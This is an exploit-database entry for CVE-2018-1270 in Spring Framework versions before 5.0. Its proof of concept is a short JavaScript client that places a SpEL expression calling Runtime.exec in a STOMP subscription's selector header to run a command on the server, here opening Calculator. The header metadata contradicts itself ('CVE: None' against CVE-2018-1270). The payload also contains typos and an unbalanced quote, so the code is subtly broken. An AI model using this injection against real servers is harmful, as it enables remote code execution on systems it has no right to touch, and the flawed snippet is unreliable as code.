Pivotal Spring Java Framework < 5.0 - Remote Code Execution Exploit

2018-05-29
ID: 98114
CVE: None
Download vulnerable application: None
# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage:
# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development
# CVE: CVE: CVE-2018-1270
# Version: <= 5.0.x 
  # Description: By connecting to spring STOMP, and putting the key for "selector" 
# header, we can execute code on Spring.
  # POC:
# Here' we are writting java commands to be executed within the selector header
# Connecting to a web socket using SockJS
# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable
  var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"};
  var socket = new SockJS('/gs-guide-websocket');
var stompClient = webstomp.over(socket);
stompClient.connect({}, function (frame){
    setConnected(true);
    console.log('Connected: ' + frame);
    stompClient.subscribe('/topic/greetings', function(greeting){
        showGreeting(JSON.parse(greeting.body).content);
        },header);
});
1-4-2 (www02)